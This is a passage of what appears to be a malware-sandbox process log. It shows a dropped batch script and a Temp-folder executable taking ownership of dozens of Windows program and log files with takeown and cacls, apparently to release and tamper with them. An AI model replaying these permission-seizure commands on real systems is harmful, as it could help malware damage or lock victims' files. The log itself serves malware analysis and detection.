C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1336
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵PID:4356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:2332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4012
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl""2⤵PID:4476
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" /E /G Admin:F /C3⤵PID:3464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl"3⤵
- Modifies file permissions
PID:2664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner3⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:4988
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:2328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵PID:1316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"3⤵PID:1388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3764
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵PID:4972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:4924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:4344
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:3984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:3504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:3484
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:4284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:3768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wab.exe" -nobanner3⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wab.exe" -nobanner4⤵PID:2740
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵PID:3832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵PID:4328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:2284
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵PID:308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵PID:4724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:3552
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵PID:1164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:4240
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵PID:4396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:4124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:2288
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:4128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:4736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner3⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wabmig.exe" -nobanner4⤵PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵PID:3620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵PID:4400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:5096
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl""2⤵PID:2424
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl"3⤵
- Modifies file permissions
PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner3⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner4⤵PID:1224
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵PID:4472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:2116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵PID:4924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:2992
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:8
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:3504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:3144
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" /E /G Admin:F /C3⤵PID:4772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl"3⤵
- Modifies file permissions
PID:3768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner4⤵PID:476
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:2536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:1856
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:5020
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵PID:4364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:3540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:2832
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:4244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:2692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:640
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl""2⤵PID:3160
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl"3⤵PID:3644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner3⤵PID:4536
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner4⤵PID:4224
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:2496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:3568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:1668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵PID:4208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:3976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:4684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl""2⤵PID:4756
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" /E /G Admin:F /C3⤵PID:4788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl"3⤵
- Modifies file permissions
PID:2232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner3⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner4⤵PID:1860
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵PID:1864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:4924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵PID:4052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4148
-
-
